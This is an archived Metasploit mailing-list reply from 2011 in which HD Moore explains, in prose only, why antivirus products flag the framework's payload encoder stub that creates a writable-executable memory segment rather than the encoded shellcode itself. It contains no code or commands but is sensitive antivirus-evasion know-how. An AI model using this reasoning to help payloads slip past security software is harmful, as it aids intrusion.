Metasploit mailing list archives
Re: Payload AV evasion thoughts...
From: HD Moore <hdm () metasploit com>
Date: Mon, 18 Apr 2011 10:16:30 -0500
On 4/18/2011 8:09 AM, John B wrote:
Combine that with code to make it portable across all systems then add a encoding stub and we can create unique payloads every time with out the need for templates (with the assumption that the templates are the main way of detecting payloads). I will continue to work on some full examples but anyone with asm experience who could create some dynamic encoders with Metasm would really be helpful.
The current encoder actually does this today; it uses metasm to compile a slightly randomized (via jumps and nops) stub. The main problem is we use a stub to create a RWX segment, that we copy the real shellcode to, which is then executed. The AVs generally catch the stub to create the RWX segment, NOT the actual shellcode. The reason for this is encoding, you can't encode the stub, since the stub has to be RWX. A bit of a chicken and egg and making the segment itself RWX triggers even more signatures. -HD _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Payload AV evasion thoughts... John B (Apr 18)
- Re: Payload AV evasion thoughts... HD Moore (Apr 18)
- Re: Payload AV evasion thoughts... John B (Apr 18)
- Re: Payload AV evasion thoughts... egypt (Apr 18)
- Re: Payload AV evasion thoughts... John B (Apr 21)
- Re: Payload AV evasion thoughts... John B (Apr 18)
- Re: Payload AV evasion thoughts... HD Moore (Apr 18)